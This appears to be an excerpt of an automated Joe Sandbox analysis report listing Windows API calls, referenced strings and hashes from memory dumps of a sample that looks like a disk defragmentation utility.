                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402045$CPUUsageExceed
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-436957165
                                                                                                                                                                                                                                                                                                • Opcode ID: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                                • Instruction ID: ba179efc8f1fc514a3e2d6bea4a1845afbd83289b5d047454f20136ff34bde4d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB1191B1644601BFD310DF14DD85FAAB7A8FF48B14F108A2EF55EA22D0DB78A844CB59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,1088D068,?,?,?,00478D19,000000FF,0045997D,?), ref: 0045CF8C
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000007,00000000,00000003,20000000,00000000), ref: 0045CFE9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                                                                • API String ID: 415043291-4282027825
                                                                                                                                                                                                                                                                                                • Opcode ID: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                                • Instruction ID: 901598558c3e4d11bc3258ba10a6420141faa6f62916cefdcf4a46bf13df9223
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB1173766083009FE310CB54EC89F5BB7A9FB84721F10492EF959973D0D7789848C795
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?,?,75A7AF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateDriveDrivesInitializeInstanceLogicalTypeUninitialize
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 16435998-3404278061
                                                                                                                                                                                                                                                                                                • Opcode ID: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                                • Instruction ID: b0155039b9989220c3f10694d0f533bb6dad7ff0edda0b00871a7334ab537921
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2901D4B6A183119B8314DF28DCC56AB73A5EB89314B01453FE45AC7251EB78AC84CBCA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CF9B
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042CFF6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageRedrawSendWindow
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 1030633669-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 322b72833a8646d25a97c7267da0ac355cbd00ada31bdbfef420a7c5b9529279
                                                                                                                                                                                                                                                                                                • Instruction ID: d25022c26ba7c65596874a3e6aca49c08802d942c9937e1375339a52bc2b998b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 322b72833a8646d25a97c7267da0ac355cbd00ada31bdbfef420a7c5b9529279
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46018B313006119BD7349A79DA89FDFB3A5AB94700F15481FF24ABB2C0CAF47881C64C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 0041A811
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: PathFileExistsW.SHLWAPI(?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: SHCreateDirectory.SHELL32(00000000,?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • SYSTEM\CurrentControlSet\services\BootDefrag, xrefs: 0041A7E5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$CloseCreateDirectoryExistsFileFolderOpenSpecial
                                                                                                                                                                                                                                                                                                • String ID: SYSTEM\CurrentControlSet\services\BootDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 2992731242-3464295076
                                                                                                                                                                                                                                                                                                • Opcode ID: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a09b35f9698f17151a02b8af7ff6770b374517e2ed940df591338b91f7cf978
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02D012B0215200DAE314BBB1DC45B9E33A4EB40315F10492EB45AC1580CB7894998B6A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateExchangeInterlocked
                                                                                                                                                                                                                                                                                                • String ID: }I
                                                                                                                                                                                                                                                                                                • API String ID: 1770991917-1906338323
                                                                                                                                                                                                                                                                                                • Opcode ID: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                                • Instruction ID: a163272bfcbb607c39215aeccd5f887c100e22747e7019c329861ded96e1c357
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64D05E2390012056CA10521ABC48FE6672CAF91360F46427EF80DF71609329A8424AAC
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 004012B2
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004012C4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteExchangeInterlocked
                                                                                                                                                                                                                                                                                                • String ID: }I
                                                                                                                                                                                                                                                                                                • API String ID: 1722977832-1906338323
                                                                                                                                                                                                                                                                                                • Opcode ID: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                                • Instruction ID: 0f44d1f4ef78c4913e9163893a1f1e1819881c729740a469ce0397d160b8c871
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1D05E678000205A9A04521ABC48CE7662CDE9536034A427EFC0DF3160D7299C428AAC
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,{E0A52416-D56A-4c3d-BFC7-3F40E77C718E}), ref: 0041A782
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041A793
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}, xrefs: 0041A779
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                • String ID: {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}
                                                                                                                                                                                                                                                                                                • API String ID: 1925916568-1835452401
                                                                                                                                                                                                                                                                                                • Opcode ID: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                                • Instruction ID: f658fb253292798967ff69ee4118aed0b3c4d26085bed42abcbed525fae359d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80D05E383003019BEB609B30CC9979A35A0AB40742FE0887EF01FE46C0DA6CD5C48E09
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041A753
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • {4391F12D-936B-4037-9383-DCB800DF7B65}, xrefs: 0041A739
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                • String ID: {4391F12D-936B-4037-9383-DCB800DF7B65}
                                                                                                                                                                                                                                                                                                • API String ID: 1925916568-3123431990
                                                                                                                                                                                                                                                                                                • Opcode ID: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                                • Instruction ID: ec8680d88669c7631082afe2fce56944a0d96bb555ced3f370f40cb7f6e8cb2a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D05E343003019BEB646B30CC9539A35A0AB40742FE0887EF01FE46D0EA6CD5D49A09
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 0060926D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2631854093.0000000000609000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                • Opcode ID: de148ecc26438995122263fd84e79d06e7e20828183585f1ddfda33d16eac7f6
                                                                                                                                                                                                                                                                                                • Instruction ID: 902ea12ca2a8b9ed67c7dd2cdb2c025495265744e63fc664879fcf873e36f5e2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de148ecc26438995122263fd84e79d06e7e20828183585f1ddfda33d16eac7f6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41518D71A4424ADFCF45CF98C991AEEBBF2EF09314F284095E465F7282C234AA51DF64
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00609314
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00609098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 006090C1
                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00609366
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 006093C0
                                                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 006093F3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2631854093.0000000000609000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Virtual$Alloc$FreeProtect
                                                                                                                                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                                                                                                                                • API String ID: 980677596-3772416878
                                                                                                                                                                                                                                                                                                • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                                • Instruction ID: 738af253e33fc2844edb25ff7b5a8cc7bc7a71a48a5dee11789a4da4251f10ed
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C951F875940609AFCB24DFA9C881ADFBBF9FF08344F10851AF959A7281D370E951CBA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3509577899-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4e897855b1c91e27b5b3822bf0bfb6303626a7a146d8b7883a30a41037c14f16
                                                                                                                                                                                                                                                                                                • Instruction ID: 827714dbcdcd14d99d3e51517cca221d75a07404051d043b83e984966f2d593b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e897855b1c91e27b5b3822bf0bfb6303626a7a146d8b7883a30a41037c14f16
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C516E72640606AFFB299EA4CC85FEB7BAAEF45710F150129FD08962D1EB30ED508660
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,006012D6,00000001,00000364,00000000,?,000000FF,?,006044E3,?,?,00000000), ref: 00601789
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ee48cdcd52c4b806542326aadda53ed618c04df8f8a6fc717b050504461e197c
                                                                                                                                                                                                                                                                                                • Instruction ID: c9542868706a0b26f0befe5ef7ec36d79098caa58275dbf31f89df352360f859
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee48cdcd52c4b806542326aadda53ed618c04df8f8a6fc717b050504461e197c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1F0E9316C02356BDB6E2A229C55BAB374BDF837B0B198016FC08DE2D0EB70DC0486E4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LCMapStringEx.KERNELBASE(?,00600C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00603D75
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: String
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0945d66e0fc2f7f49b1f81aa2a293dc726ff8842d5d07da23efdc00a5881f432
                                                                                                                                                                                                                                                                                                • Instruction ID: 740aec800bbd3e0fb76d046b126ff8390ddaf2ff82bd4ff66e6689982e7aeed7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0945d66e0fc2f7f49b1f81aa2a293dc726ff8842d5d07da23efdc00a5881f432
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF09D3644022ABBCF165F91DC19DDE3F2BEF48761F098115FA18652A0C732C971EB90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(?,00000000,?), ref: 005FBFCE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 42e18fdff2272388e3abfa12b665a75fca2b4c47cf89466845bbaf97ee75eff6
                                                                                                                                                                                                                                                                                                • Instruction ID: e70edae92fdbffabaaba60a6755b8701382e4f5cba9e763386f9103fb5502931
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42e18fdff2272388e3abfa12b665a75fca2b4c47cf89466845bbaf97ee75eff6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C311675D00209EFDB10CFA9DC90BAEBFF5BB49700F14902AE655A7250D775A904CFA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 005FBCC7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b37e437db9babc49ae3a4f1b2521bdd3b518e7ba0ebdf2ed44f89321ffd0326e
                                                                                                                                                                                                                                                                                                • Instruction ID: 030da3c3227afd8d4ea6e01ef0ce71907682b02e1b5281fd6f05bfe7084934fc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b37e437db9babc49ae3a4f1b2521bdd3b518e7ba0ebdf2ed44f89321ffd0326e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7E06DB5A01617BBA3227B20DD19DBB7A6DFF99742309842AF900E2240DF24DD01C6B1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 006090C1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2631854093.0000000000609000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5fa5c9145237fa88e1aa37702aad2718761a025d2b836103e406ca8614d22d44
                                                                                                                                                                                                                                                                                                • Instruction ID: e0a3c4391ce4dc5eb8148b91bd9264e555e35f2c9cedfedefd59b9bde2fcb326
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fa5c9145237fa88e1aa37702aad2718761a025d2b836103e406ca8614d22d44
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A01C471D40249EFEB04CF95C449BAEBBB1AB14326F108059E521AA2D2C3B85A86DF94
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,0000024C), ref: 004112A2
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FindPrivateProfileString$File$ByteCloseFirstFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: 3401068$3401069$3401070$DefragTime$DefraggedFileCount$DG$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 295610168-2526466113
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 2174522762-3670384684
